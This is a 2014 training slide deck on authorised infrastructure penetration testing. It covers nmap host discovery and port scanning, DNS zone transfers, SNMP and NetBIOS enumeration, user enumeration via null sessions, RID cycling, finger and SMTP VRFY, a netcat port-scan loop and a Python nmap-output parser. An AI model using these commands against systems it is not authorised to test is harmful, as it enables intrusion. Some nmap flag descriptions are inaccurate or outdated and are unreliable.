
Infrastructure Testing Training

November 2014
Information Protection, UK
Who am I?
INTERNAL USE ONLY

• Marc Wickenden
• Technical Director at 4ARMED
• @marcwickenden

© 2011 KPMG LLP, a UK limited liability partnership, a subsidiary of KPMG Europe LLP and a member firm of the KPMG network of independent 2
member firms affiliated with KPMG International Cooperative ('KPMG International'), a Swiss entity. All rights reserved.
Agenda

Background & Preparation

Network Layer - Mapping & Enumeration

Service & Vulnerability Enumeration

Windows – Remote Exploitation

Windows – Local Privilege Escalation

*nix – Remote Exploitation

*nix – Local Privilege Escalation

Summary & Capture the Flag (CTF)

What is an infrastructure penetration test?

"An exploitative test of whether the target system's security controls can be defeated"

Penetration tests are cyclic

(Figure: a cycle of Identify → Exploit, repeated)
Not a Vulnerability Assessment
Types of infrastructure penetration test

• Black box
• Advantages:
• More like a real-world attack
• Disadvantages:
• Not really like a real-world attack

• White box
• Advantages:
• Deeper level of assurance, easier to achieve scope
• Disadvantages:
• Can "lead" the tester and actually be more time-consuming

What you need to test

1. The right attitude
2. The basics nailed
3. Some tools
4. Creative and lateral thinking

Methodology
Phases of the Methodology

1. Preparation
2. Mapping and Target Enumeration
3. Service Enumeration
4. Vulnerability Analysis
5. Exploitation
6. Post Exploitation

Preparation

• Update toolkit
• Make sure licenses are valid
• Equipment check
• Scope – (more to follow)

Scope – Things to consider

• Confirm the number of hosts within the test is still correct as per the scope.
• Are hosts firewalled? This will slow things down.
• Are there any legacy / critical systems or slow network links that could be affected by the testing?
• Are there Intrusion Prevention Systems (IPS)? This may require packet manipulation, stealthy scans etc. Again, this will slow things down.
• Example - Solaris hosts employ rate limiting on port scanning; this can significantly slow things down, especially on UDP port scans.
• What technologies underpin the network? Is it a big Windows domain, are there Linux or Solaris hosts? Knowing this will help you focus and get the right tools ready.
• Do you need to provide the MAC address of your laptop? Does your laptop need to be joined to the domain before network connectivity is granted?
• Check that you know who the technical contact is (often a network engineer) if things go wrong on the day.
• Do you need to demonstrate AV/patches before connecting to the network?

First things first…

• Record the IP address on your testing laptop – every time it changes!
• ipconfig /all >> ipconfig.txt (Windows)
• ifconfig -a >> ifconfig.txt (*nix)
• Perform passive network analysis – confirm correct VLAN
• Scan and traceroute to one host/IP – how long did it take? Scale that to the number of hosts identified to see how long the whole scope might take to cover
• Consider an Nmap broadcast scan
• nmap -P0 --script "broadcast and not dos"

Network Layer – Mapping & Target Enumeration

• Understand the IP network
• Addressing
• Subnets
• Routing
• Active hosts
• Draw a network map (bonus points with most clients who don't have one)
• Perform port scans
• If this is CHECK/PSN you need to show full port scans

Enumerating Hosts & Routing (tcpdump / wireshark)

• Passive Wireshark capture – any interesting broadcasts, identification of routing protocols (BGP, OSPF etc.) and potential router/switch devices
• Straightforward Linux command line to capture ASCII packets from the default interface: -
• # tcpdump -X -s 0 -vv -l | tee <output file>
• Look for broadcast packets, e.g. from Windows NetBIOS, Cisco Discovery Protocol, broadcast routing packets (e.g. RIP).
• CDP packets contain VLAN information, which may be useful if you wish to attempt VLAN hopping later.
• Check the packet contents for hostnames, IP addresses etc.
• There may even be credentials (SMB, HSRP, etc.)

Enumerating Hosts (Zone Transfers)

• DNS servers transfer zone information between masters and slaves
• By default Windows DNS (often part of Active Directory) will not allow a zone transfer, but Linux / Unix BIND installations frequently permit it.
• You can perform a zone transfer like this:
• nslookup syntax (Windows / Linux):
$ nslookup
> server <server-IP>
> set type=any
> ls -d <domain>
• On Linux you can use the axfr utility or dig:
$ axfr <domain>
$ dig <domain> @<NS IP Address> axfr

Enumerating Hosts & Networks (SNMP)

• Simple Network Management Protocol (SNMP) is very common on networking devices
• Provides the ability to query or configure devices
• SNMP communicates over UDP on port 161
• Versions 1/2c use a "community string" – basically a password (defaults are "public" and "private")
• Version 3 introduced users, passwords and encryption
• Routers and hosts can reveal a great deal of information including routing tables, hostnames, multiple interfaces and even usernames, installed software and process lists.

Enumerating Hosts & Networks (SNMP)…

• A number of different tools exist for SNMP scanning and subsequent querying:
• Snscan (Windows) – can scan whole ranges or lists of IPs with a supplied dictionary of community strings
• GetIF (Windows) – can query SNMP in detail: http://www.wtcs.org/snmp4tpc/getif.htm (needs to be run in compatibility mode on Win7)
• Snmpcheck (PERL) - http://www.nothink.org/perl/snmpcheck/
• Snmpwalk (Unix) – common SNMP library / client packages found in most Unix distributions.
• OneSixtyOne – Linux community string bruteforcer
• How to determine whether a target has the public community string using snmpwalk on Linux: -
• $ snmpwalk -Os -v 1 -c public <IP address>

Enumerating Hosts and Networks (Windows Network)

• Windows computers, workgroups and domains broadcast their presence on the network and browse lists are automatically populated with Windows machines on the network. This can provide an invaluable target list and can be used to identify significant components of the network (e.g. Active Directory machines or SQL servers).
• It is possible to view the list of devices that your laptop can 'see' using the Windows 'NET VIEW' command.
• It is also possible to see them via the GUI using the Windows Network Explorer application.
• Cain & Abel will also provide a list of machines on the network, including their role.
• To convert Windows hostnames to IP addresses, use nslookup or ping (which will also confirm whether the device is up): -
C:\> PING LONADC1

Pinging lonadc1.client.int [192.168.0.130] with 32 bytes of data:
Reply from 192.168.0.130: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.0.130:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Enumerating Hosts & Networks (Windows Network)

• For Windows networks, it is useful to enumerate domain names and domain information.
• Windows uses NetBIOS (UDP 137) for relaying much information about domains to other Windows hosts on the network.
• Native Windows tools are best for this enumeration:

Windows command                                        Action
net view /domain                                       Lists identified domains on a network
net view /domain:<domain>                              Lists identified hosts in a specific domain
nltest /dclist:<domain>                                Lists domain controllers on a domain
nbtstat -A <IP address>                                Lists NetBIOS name table from a remote system
nbtscan <IP-range>                                     As above but for whole network ranges
mbenum [-s \\server] [-d dom] [-f filter] -p <mode>    Lists all device types in a domain

• Note: Cain & Abel will perform many of these tasks by default.

Enumerating Hosts & Networks – Joining it all Together
• Putting it all together you will likely have at least: -
• Local Subnet
• Local Gateway
• DHCP Servers
• DNS Servers
• Active Directory Servers
• MSSQL Servers
• Web Servers
• All of these hosts may reside on a local or remote subnet, so it is then possible to expand
on these and draw up a potential list of networks.
• Using traceroute and hping it is possible to map the network path between the source and
the destination, which may reveal further networks containing targets within the
environment.

Mapping Routes

• IP headers contain a Time To Live (TTL) field
• Prevents packets existing forever
• Each gateway decrements the TTL by one
• If the TTL reaches zero the router discards the packet and sends ICMP TTL Expired In Transit to the originating host
• We can send crafted IP packets to enumerate upstream devices

Mapping Routes: Example Network

(Figure: mapping a network from Src Laptop to DEST. The laptop sends an ICMP Echo Request with TTL=1; the first router decrements it to zero and answers with ICMP Time Exceeded. The laptop then sends an ICMP Echo Request with TTL=2; the second router answers with ICMP Time Exceeded. Once the TTL is large enough to reach DEST, DEST answers with an ICMP Echo Reply.)
Mapping routes - traceroute

• Traceroute - *nix and Windows implementations are different:
• Windows: tracert – uses ICMP packets.
• *nix: traceroute – uses UDP packets by default; you can specify ICMP with the '-I' option.

• Almost certainly will be blocked. Almost a finding in itself if it works!

Mapping routes – hping3

• hping3 – This tool can perform traceroutes using any protocol by simply specifying a port number. It should be noted that using TCP port 80 in hping traceroutes often enumerates more intermediate hops.
• The example below is a TCP traceroute using hping3:
• $ hping3 -T -S -p <port #> <IP address>
• Note that the output "stops" on a hop that does not respond with a TTL packet; use CTRL-Z to restart…

Mapping routes – Nmap

• Nmap also has a traceroute option (--traceroute); this is very fast and useful on tests.
• On the Windows or *nix command line 'ping -r' records the IP addresses of intermediate hops in the IP header. A maximum of 9 addresses can be recorded.
• Windows: ping -r 9 <host>
• *nix: ping -R <host>

Host Discovery

• Host discovery on a local Ethernet network is 100% accurate – why?
• Firewalls operate at Layer 3 (and up)

Host Discovery – Network Layers

Host A – 192.168.0.3                     Host B – 192.168.0.4

TCP     4. Transport       4. Transport     TCP
IP      3. Network         3. Network       IP
ARP     2. Data Link       2. Data Link     ARP
CABLE   1. Physical        1. Physical      CABLE

Host Discovery

• Therefore, ARP scans should be used on local subnets
• Remote subnets are not so easy
– Firewalls and other filtering devices come into play
– Often prudent to attempt a common ports TCP scan to start off (25, 80, 443, etc)
– Bear in mind a full port scan will need to be done as well
– At the end of the day we're looking for services to potentially exploit
– These services need to be available, firewall or not

Host Discovery

(Figure: firewall ACL rules restricting ICMP but permitting 80/TCP to the server. From Src Laptop: an ARP Request on the local segment is answered with an ARP Response; an ICMP Echo Request towards the server is blocked by the firewall, so no Echo Reply returns; a TCP SYN packet (DST PORT = 80) passes the firewall and the server answers with TCP SYN/ACK (SRC Port = 80), showing the host is up even though it does not answer ping.)
Host Discovery

Ping sweeps: nmap -sP <target(s)>

Useful options here include:
• --exclude (e.g. for your own IP address)
• --excludefile <file> (file of targets to be excluded)
• --traceroute (as the name suggests)
• -n (don't resolve DNS – useful if a DNS server is not on the network / subnet)
• -vv more verbose output
• -oA output in All formats (nmap, gnmap and xml)
Then select a sweep type, one of: -
• -PO (protocol scan – identifies which protocols are supported by a device)
• -PA (ARP sweep)
• -PE (ICMP ECHO sweep)
• -PM (ICMP Mask sweep)
• -PT (ICMP Timestamp sweep)
• -PS <port #> (SYN sweep on given port # or comma separated list)
• -PU <port #> (UDP sweep on given port # or comma separated list – though given the connectionless nature of the protocol, a UDP sweep is very rarely used)

Host Discovery
The output from a sweep file might look like this: -
# Nmap 6.25 scan initiated Mon Jan 20 10:31:39 2014 as: nmap -sP -PA -vv -oA pingsweep.192.168.100.0 192.168.100.0/24
<CUT>
Nmap scan report for 192.168.100.109 [host down]
Nmap scan report for ddpbk1.TARGET.local (192.168.100.110)
Host is up (0.00030s latency).
MAC Address: 00:50:56:B2:00:05 (VMware)
Nmap scan report for 192.168.100.111 [host down]
Nmap scan report for dp-manage01.TARGET.local (192.168.100.112)
Host is up (0.00025s latency).
MAC Address: 00:50:56:B2:00:0D (VMware)
Nmap scan report for 192.168.100.113 [host down]
Nmap scan report for 192.168.100.114 [host down]
Nmap scan report for 192.168.100.115 [host down]
Nmap scan report for 192.168.100.116 [host down]
Nmap scan report for 192.168.100.117 [host down]
Nmap scan report for 192.168.100.118 [host down]
Nmap scan report for ddpdc1.TARGET.local (192.168.100.119)
Host is up (0.00026s latency).
MAC Address: 00:0C:29:EE:BB:BB (VMware)
Nmap scan report for ddpdc2.TARGET.local (192.168.100.120)
Host is up (0.00025s latency).
MAC Address: 00:50:56:B2:00:00 (VMware)
<CUT>

As the example output is an ARP scan, the tool also shows the target MAC address. It is straightforward to manipulate/grep the gnmap output file to create specific target lists.

Exercise 1: Duration 45 minutes

• Assign yourself an IP address on the network
• Draw a map of the network to which you're connected:
• Identify different subnets
• Identify hostnames and/or IP addresses
• Identify router hops
Remember: ping sweeps, traceroutes, SNMP, DNS zone transfers, etc…

Enumerating Services

• Now that we've roughly identified the layout of the network and live hosts, we look at what services these hosts offer (open ports).
• This is the point at which port scanning is carried out – the main services are normally served via TCP and UDP, therefore we ideally need to perform both types of scan.
• It is important to make pragmatic choices on the time available to conduct infrastructure tests, to ensure that enough coverage can be achieved in the given timescales.
• Perform a scan of one host to see how long this takes. Full port scans of all ports (65536) may not be realistic – concentrate on Nmap's default port range, or if time is short use --top-ports 'X' to scan the 'X' most common ports.
• In time-critical situations, you can use other scanners, such as Masscan, to complete large networks in a short time.
• Note: UDP scanning can take a long time for a number of reasons:
• the protocol is connectionless
• there are no guarantees on sent/received UDP packets
• a number of IP stacks rate-limit UDP connections (especially Solaris hosts)
• As such, often only a services scan is undertaken of UDP ports. However, other tools could be considered in this scenario.

Enumerating Services
• Nmap again is the most common tool used for conducting port scans.
• It is important to fully understand how Nmap is operating with regard to its mode of port scanning to ensure a reasonable coverage of hosts and ports is returned.
• Remember from the Nmap ping sweep usage that the -P<type> flag specifies the protocol that is used for the sweep?
• This flag is also used in port scans, but in this instance instructs Nmap how to identify the hosts to be scanned.
• If this flag is omitted then the scanner will default to using a combination of ICMP ECHO and TCP port 80 to identify valid hosts.
• If a response is not received to the initial sweep requests within a given time then the target IP address will NOT be port scanned.
• Using -P0 it is possible to instruct Nmap not to try to identify hosts to scan using ping, i.e. scan ALL IP addresses.
• Once the target identification flag (-P<type>) has been set, then use the -s flag to specify the port scan type. This defines the protocol (typically TCP or UDP, but there are other types of malformed scans which are commonly used to test firewall evasion) that is used for the scan.
• There are then other flags which can be used, including -p which specifies the port range (-p- specifies ports 1-65535) as well as instructing Nmap to carry out additional supplementary functionality such as Operating System fingerprinting (-O), network services banner grabbing (-sV) etc.
• The next slide provides more details on the various flags used in a port scan and the following slide shows an example of conducting a portscan of a remote host using ICMP ECHO to identify the target followed by a SYN scan on ports 80/TCP and 443/TCP.

Enumerating Services

Nmap Port Scanning Cheat Sheet

-P<target id method>
• -P0 – use nothing (portscan all)
• -PA – use ARP
• -PI / -PE – use ICMP Echo
• -PM – use ICMP netmask
• -PP – use ICMP Timestamp
• -PS80,443 – use TCP SYN on port 80 and 443
• -PT80,443 – use full TCP connect on port 80 and 443

-s<portscan method>
Most common scan types: -
• -sS – do a SYN scan
• -sT – do a TCP full connect scan
• -sU – do a UDP scan
• -sL – don't do a network scan at all, just list the targets to the output (good for multiple reverse DNS lookups or generating target lists)
More esoteric scan options (firewall testing):
• -sX – TCP XMAS scan (all flags set)
• -sN – TCP Null scan (no flags set)
• -sA – TCP ACK scan (ACK flag set)
• -sF – TCP FIN scan (FIN flag set)

Other Common Options
• -g <#> - source port of scans, useful for fw evasion – try 20 and 53
• -p – port range (e.g. 1-1024, 21,22,23,53,80,443 or -p- for all)
• -O – Operating System fingerprint (careful on legacy systems, can cause crashes)
• -sV – poor choice of flag type by Nmap author, but also conducts version fingerprinting of services
Add to existing portscan method:
• -sC – run additional scripts
• --reason – Nmap explains how it came to determine the result in the output
• --script – Nmap comes with lots of scripts that can enumerate common info or identify vulnerabilities
Also a number of timing options – man nmap

Output Type
• -oA <filename> - all output types (appends .gnmap / .nmap and .xml)
• -oN <filename> - Nmap human readable
• -oG <filename> - Nmap machine readable
• -oX <filename> - XML output
• -oS <filename> - script kiddy for lulz

Targets
• <TARGET IP, range or list>
• -iL <text file of targets>

Enumerating Services: Example Port Scanning with Nmap

# nmap -PE -sS -p 80,443 -vv -oA portscan.192.168.1.1 192.168.1.1

Identify whether the target is up using an ICMP Echo Request [1]; an ICMP Echo Reply [2] is received (positive), therefore port scan the system on 80/TCP and 443/TCP by sending TCP SYN packets [3] and [5]. In this case a SYN/ACK packet [4] is returned from the target on 80/TCP (port open) and a RST packet [6] on 443/TCP (port closed).

1) ICMP Echo Request
2) ICMP Echo Reply
3) TCP SYN Packet (DST PORT = 80)
4) TCP SYN/ACK Packet (SRC Port = 80)
5) TCP SYN Packet (DST PORT = 443)
6) TCP RST Packet (SRC Port = 443)

Enumerating Services: Understanding Nmap TCP Scan Output

TCP is connection-orientated and therefore will provide responses in most cases to the
protocol opening sequence.
Nmap will report that each port on any given TCP scanned target is: -
• Open – received a TCP SYN/ACK response within the timeout interval.
• Closed – received a TCP RST response within the timeout interval.
• Filtered – Nmap did not receive a response in the timeout interval. This can mean: -
• The IP address is not being used at all or is completely protected by network security
firewall - particularly if all other ports are filtered (Filtered)
• The destination port is filtered by a firewall – if other ports on the target IP address are
open then this is likely to be the case (Filtered)
• Network conditions meant that a TCP response packet was not received prior to the
timeout – (WARNING! THE TESTER HAS MISSED SOMETHING!)

Enumerating Services: Understanding Nmap UDP Scan Output

UDP is a connectionless protocol, so it is not as straightforward to identify:
• no specific UDP protocol opening sequences, just the application protocol itself.
• The target's IP stack sends an ICMP PORT_UNREACHABLE packet back to the source if the port is not used.

Nmap will report that each port on any given UDP scanned target is: -
• Open – received a UDP packet back; the application protocol has responded, even to a likely mismatched initial application protocol connection
• Closed – Nmap received an ICMP PORT_UNREACHABLE response.
• Open|Filtered – No response in the timeout interval. This can mean: -
• The UDP port is being used but the source did not send the correct application protocol sequence (Open)
• The IP address is not being used at all or is completely protected by a network security firewall - particularly if all other ports are filtered (Filtered)
• The destination port is filtered by a firewall (Filtered)
• Network conditions meant that a response packet was not received prior to the timeout – (WARNING! THE TESTER HAS MISSED SOMETHING!)

Enumerating Services: Nmap Output

The output from a TCP port scan Nmap output file might look like this: -
# Nmap 6.25 scan initiated Tue Feb 25 09:25:17 2014 as: nmap -sS -v -oA portscan.tcp.services.europe -i europe.txt -sV -n
<CUT>
Nmap scan report for 192.168.204.2
Host is up (0.068s latency).
All 1000 scanned ports on 192.168.204.2 are closed

Nmap scan report for 192.168.204.3
Host is up (0.057s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
2001/tcp open  telnet     Cisco router telnetd
4001/tcp open  tcpwrapped
6001/tcp open  tcpwrapped
9001/tcp open  tcpwrapped
Service Info: OS: IOS; Device: router; CPE: cpe:/o:cisco:ios

Nmap scan report for 192.168.204.7
Host is up (0.069s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http?
443/tcp open  ssl/http Juniper SA2000 or SA4000 VPN gateway http config
Service Info: Device: proxy server
<CUT>

Notes on the output: -
• 192.168.204.3 – some ports are open but the remaining ports are closed (more likely not behind a firewall)
• 192.168.204.7 – ports 80 and 443 are open but the remaining ports are filtered (likely behind a firewall)
• 192.168.204.7 – ports are open and Nmap fingerprinted the SSL port to be a Juniper firewall / VPN login page

Enumerating Unknown Services: nc and ncat

• Some ports are open but do not respond with common protocol responses – Nmap will not fingerprint them!
• nc and ncat are incredibly powerful tools – useful for:
  • Port scanning (built-in scanning).
  • Setting up network listeners (UDP and TCP) – with options to bind to a program such as cmd.exe.
  • Probing unknown services or unusual ports, then typing different commands and inputting different text to elicit a response.
• It is important to probe all unknown/unusual ports.
• When probing unknown service ports, send common protocol commands and other sequences to the ports to determine whether they provide any further responses, as demonstrated below.
• $ nc -nvv <IP address> <port>
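As an added example (not from the training material), the following Python reads Nmap normal (-oN) output like the listing on the previous slide, uses the majority "Not shown" state to separate hosts that answer with closed ports from those sitting behind a packet filter (the open|filtered case is the UDP situation from the earlier slide), and lists the open ports Nmap could not fingerprint (tcpwrapped or a "?" guess) as the ones to probe by hand with nc. The sample output, addresses and banners are constructed.

```python
import re
from typing import Dict

# Constructed sample in Nmap "normal" output format, modelled on the slide's
# example; the addresses, ports and banners are illustrative only.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 6.25 scan initiated Tue Feb 25 09:25:17 2014 as: nmap -sS -sU -sV -n -oN scan.txt
Nmap scan report for 192.168.204.2
Host is up (0.068s latency).
All 1000 scanned ports on 192.168.204.2 are closed

Nmap scan report for 192.168.204.3
Host is up (0.057s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
2001/tcp open  telnet     Cisco router telnetd
4001/tcp open  tcpwrapped
6001/tcp open  tcpwrapped
9001/tcp open  tcpwrapped
Service Info: OS: IOS; Device: router; CPE: cpe:/o:cisco:ios

Nmap scan report for 192.168.204.7
Host is up (0.069s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http?
443/tcp open  ssl/http Juniper SA2000 or SA4000 VPN gateway http config
Service Info: Device: proxy server

Nmap scan report for 192.168.204.9
Host is up (0.071s latency).
Not shown: 999 open|filtered ports
PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)
"""

REPORT_PREFIX = "Nmap scan report for "
PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
NOT_SHOWN_RE = re.compile(r"(\d+) (closed|filtered|open\|filtered) ports")
ALL_PORTS_RE = re.compile(r"^All \d+ scanned ports on \S+ are (\S+)")

# What the state of the bulk of unlisted ports says about the path to the host.
EXPOSURE = {
    "closed": "responds to probes: probably not behind a packet filter",
    "filtered": "no responses for most ports: probably behind a firewall",
    "open|filtered": "UDP silence: inconclusive, see the UDP scan slide",
}


def parse_nmap_normal(text: str) -> Dict[str, dict]:
    """Parse -oN output into {host: {"default_state": str, "ports": [...]}}."""
    hosts: Dict[str, dict] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(REPORT_PREFIX):
            current = line[len(REPORT_PREFIX):].split()[0]
            hosts[current] = {"default_state": None, "ports": []}
            continue
        if current is None:
            continue
        m = ALL_PORTS_RE.match(line)
        if m:
            hosts[current]["default_state"] = m.group(1)
            continue
        if line.startswith("Not shown:"):
            # e.g. "Not shown: 990 closed ports, 5 filtered ports": take the majority
            pairs = NOT_SHOWN_RE.findall(line)
            if pairs:
                hosts[current]["default_state"] = max(pairs, key=lambda p: int(p[0]))[1]
            continue
        m = PORT_RE.match(line)
        if m:
            port, state, service, version = m.groups()
            hosts[current]["ports"].append(
                {"port": port, "state": state, "service": service, "version": version or ""}
            )
    return hosts


def needs_manual_probe(port: dict) -> bool:
    """True when the port is open but Nmap could not fingerprint the service:
    'tcpwrapped' or a service guess ending in '?', the cases for nc probing."""
    return port["state"] == "open" and (
        port["service"] == "tcpwrapped" or port["service"].endswith("?")
    )


def assess(host: dict) -> dict:
    open_ports = [p for p in host["ports"] if p["state"].startswith("open")]
    return {
        "exposure": EXPOSURE.get(host["default_state"], "unknown"),
        "open_ports": [p["port"] for p in open_ports],
        "manual_probe": [p["port"] for p in open_ports if needs_manual_probe(p)],
    }


def summarise(text: str) -> Dict[str, dict]:
    return {ip: assess(info) for ip, info in parse_nmap_normal(text).items()}


if __name__ == "__main__":
    for ip, verdict in summarise(SAMPLE_NMAP_OUTPUT).items():
        print(ip, verdict)
```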

Poor man's nmap using netcat
• Netcat is often installed on Linux boxes. Behold the poor man's port scanner:

$ for port in $(seq 1 65535); do
    nc -z 10.0.1.14 $port && echo "tcp/$port"
  done

• Will give you output like this:

tcp/21
tcp/53
tcp/80
tcp/135
tcp/139
tcp/445
tcp/3389

Enumerating Hosts, Networks & Services – Joining it all Together
• Enumeration progress so far: -
• Network maps.
• Multiple targets on different networks.
• Understanding of important online resources (name servers, active directory servers, file
servers, routers, firewalls, etc.).
• Available network application services (web servers, administrative login ports, databases) with
their vendors, versions and in some cases underlying Operating Systems and hostnames etc.
• This may be the stage at which to perform a vulnerability scan.

Enumerating Users - Windows

• It is always useful to enumerate the user accounts of different services at this point – usually easy to do and it can come in useful: it informs on the username format (you can then create custom username dictionaries for brute-force attacks), and accounts may have default or weak credentials configured.
• Windows-specific username enumeration:
  • Null connection / RID cycling (depending on the registry settings of the servers – i.e. RestrictAnonymous); tools include Getacct, sid2user/user2sid, Cain & Abel, enum4linux.
  • Misconfigured/open LDAP – multiple tools available for this.
  • SNMP – reveals users / groups on the box! (see earlier slides on SNMPwalk)
  • Open SMB shares might reveal usernames (home directories).

Enumerating Users - *nix

• *nix-specific username enumeration:
  • Finger – shows who is logged in, or have a guess!
  • Rusers / Rwho – show who is logged in.
  • SMTP EXPN/VRFY/Mail To: – guess remote usernames.
  • SNMP – can return a process tree, which includes the user names running processes at the time (see earlier slides on SNMPwalk).
  • Login timing attacks – some network services take longer to respond for valid usernames than for invalid ones.
  • Open SMB / NFS shares might reveal usernames (home directories).

Enumerating Users - Web

• Web servers:
  • phpinfo() – PHP script that returns some information, sometimes including usernames in paths / processes.
  • Web server physical path leakage (sometimes within home directories containing a username).
  • Web content can contain usernames in comments etc.
  • Web application / management console logins – different responses for known / unknown usernames.

Windows User Enumeration: Null/Anonymous and RID Cycling

• Windows allows systems to legitimately make remote requests for users, groups and
other information from a remote device.
• In earlier versions of Windows this was enabled by default. In the latest versions of
Windows Server and Desktop software, the functionality is disabled by default.
• However, if the software is upgraded (rather than a fresh re-install) then the previous
setting (the RestrictAnonymous registry key) still applies.
• When RestrictAnonymous is set to 0, a great deal of information can be retrieved, including users, groups, password policy information, shares etc. This can be enumerated via a null / anonymous connection to the device.
• When RestrictAnonymous is set to 1, null connections are refused; however, a method known as RID cycling can be used to enumerate usernames from known user ID formats. Incremental calls can be made to enumerate the users on the system, though it should be noted that users that are ‘deleted’ or disabled will still be returned.
• The local Administrator account (nearly) always has a RID value of 500 and the Guest account 501. User / machine accounts then start from 1000.

Windows User Enumeration: Null/Anonymous and RID Cycling

• Enumeration tools:
• getacct
• enum
• enum4linux
• Cain & Abel
• Nessus
• Metasploit

Enum4linux

• Example of using enum4linux to enumerate users, groups, shares et al using a null connection: -
  • enum4linux -GULPS <IP Address>
• Using the tool to enumerate users via RID cycling (if a user turns up with a RID of 2000, run it again with a larger range!). NB: Samba servers often seem to have RIDs in the range 3000-3050, so be sure to check:
  • enum4linux -r -R 500-2000 <IP address>
• Look at the help page (enum4linux.pl -h) for detailed information on the various methods and flags. It is also possible to use the tool to test username and password combinations against the target system and domain.
• You can also extend this functionality using ‘polenum’ to extract the password policy.

Unix Username Enumeration: Finger
• Finger is a legacy Unix service from when the network was a much ‘friendlier’ place. It was used to determine whether colleagues were at their remote workstations.
• Without a username (finger @<IP address>) it responds with who is logged onto the workstation.
• When a username is provided (finger <user>@<IP address>) it responds with useful information such as whether that user exists, where they logged in from and their last login time. This is useful for profiling targets and identifying the IP addresses of administrative workstations or other servers.
• Different uses of finger:
  • $ finger @ip-address (might return all the logged in users)
  • $ finger "a b c d e f g h"@ip-address (Solaris bug that returned all users – versions before early Solaris 8)
  • $ finger "1 2 3 4 5 6 7 8 9 0"@ip-address (Solaris)
  • $ finger 0@ip-address (returns users with blank GECOS entries – Solaris)
  • $ finger -l .@ip-address
  • $ finger -l **@ip-address
  • $ finger -l user@ip-address
• The perl script fist.pl automates this and often finds multiple users.

Unix Username Enumeration: Rusers / RWho
• Similar to finger, these are legacy Unix RPC services.
• Rusers displays a list of logged in users:
  • $ rusers -la <IP address>
• Rwho collects broadcast information from other machines on the network and collates who is logged in. This functionality is very rarely in use, but if you have compromised a remote legacy machine in a cluster then it may be worth attempting:
  • $ rwho

Unix Username Enumeration: Sendmail SMTP Enumeration
• By default, the Sendmail service (commonly on 25/TCP) will allow remote guessing of
usernames on the system using a variety of verbs.
• Depending on the response from the server to the guessing attempts, it may be
possible to identify whether the username is valid or not, by comparing the responses.
• Try these commands on Sendmail (and other) SMTP services (use Netcat or Telnet): -
■ VRFY <username>
■ EXPN <username>
■ HELO localhost
■ MAIL FROM: <root>
■ RCPT TO: <username>

• Many tools and scripts exist to automate the process, including Hydra (see following
slides).

Exercise 2: Duration 20 minutes

• Perform a port scan of BETA (10.0.2.3) and GAMMA (10.0.2.40)
• How many open TCP ports does each host have?
• How many open UDP ports does each host have?
• What services are running?

Exercise 3: Duration 15 minutes

• Enumerate all hosts on the 10.0.2.0/24 network. Identify any domains and enumerate
those.
• Enumerate users and password policies.
• Explore the tools (and any others) from the previous slides.

Vulnerability Enumeration Automated…

• Nessus is a great tool to baseline vulnerabilities and to supplement the test findings.
• You should run Nessus against prioritised, known, live hosts only. It’s good practice to input only the list of ‘up’ hosts enumerated during the host discovery phase.
• Nessus scan policy – it is important to define this depending on the network.
• Care should be taken to configure a default policy that works for you and is then tailored on a per-test basis to be specific to the environment (ensure verbose reporting is enabled!).
• This phase isn’t just about interpreting Nessus output, as Nessus lacks the context of the network and the people. This is where we need to provide insight and make connections between the findings. For example:
  • Anonymous FTP – Nessus won’t know if an Excel spreadsheet served via anonymous FTP contains domain usernames and passwords; Nessus would mark this as a medium-level finding.
  • Unknown software – Nessus only knows about common software. A bespoke telnet application with a number of vulnerabilities may be running, for example, but Nessus cannot evaluate it.
  • It’s also worth noting that Nessus is very limited in what it can detect within web applications.
• Useful: Nessus can filter by ‘has exploit’ and can cross-reference this with Metasploit.

Vulnerability Scans – Be careful!

• Arguably the most common cause of unintended consequences on target infrastructure.
• A vulnerability scan can take a lot of network bandwidth or server resources (client complaints about ‘slowdown’).
• It uses many different techniques to identify issues, which may cause problems particularly with old or unstable software applications (client complaints about ‘applications becoming unavailable’).
• Ensure that ‘safe checks’ are enabled. Nessus has a love-hate relationship with printers, for example.
• Using a vulnerability scanner such as Nessus effectively is probably a training course in itself!

Vulnerability Enumeration MANUAL!

• Do not rely on a vulnerability scanning tool.
• The client can run a vulnerability scan themselves.
• This is the fundamental reason why they are purchasing a penetration test!

Vulnerability Enumeration MANUAL!

• There are many reasons why a scanner will not find a vulnerability or weakness:
  • The service is running on a non-standard port.
  • Network / server / client performance conditions lead to a timeout.
  • The scanner is buggy (believe it or not).
  • Intrusion detection and prevention identified the scanner and blocked all subsequent attempts.
  • Smart system administrators change the configuration of targets during the test.
  • Misconfigured scanner or policy.
  • A vulnerability that exists on the network is complex or multi-staged and cannot be identified by a scanner.
  • The scanner is not conducting password guessing / dictionary / brute force attacks.
  • The scanner does not interpret web / FTP / telnet site content.
  • The scanner does not try combinations of input to a network application based on the context of the environment.
• Ultimately a penetration tester is smarter than Nessus!

Vulnerability Enumeration - MANUAL!

• Find your own vulnerabilities – firstly, investigate the applications and versions that
were identified from the previous phases.
• Don’t forget to look at information from web servers, e.g. SAP, ColdFusion, .NET, PHP
server applications as well as off the shelf web content (lots of content is vulnerable).
• Appliances can also be vulnerable to specific weaknesses and exploits.
• Check common information security vulnerability sources (Securityfocus, exploit-db,
CVE/NVD et al) and use search engines.

Vulnerability Enumeration - MANUAL!...

• Be thorough, do not give up if the answer is not on the first page of results!
• Determine whether some weaknesses lead to information leakage that could assist
with other exploits, e.g. anonymous connections, RID cycling, SNMP on a Windows
system, finger, SMTP VRFY/EXPN / RUSERS et al on a *nix box, or PHPINFO, physical
path revelation issues, Apache server-status on web servers.
• Piece together all of the elements of the ‘jigsaw’ and hopefully it will solve the puzzle! Use information from one finding and feed it into another exploit attempt. For example, take a username identified from an information leak and try to log in to all open SSH ports using that username and common passwords.

Exercise 4: Vulnerability Enumeration: Duration 20 minutes

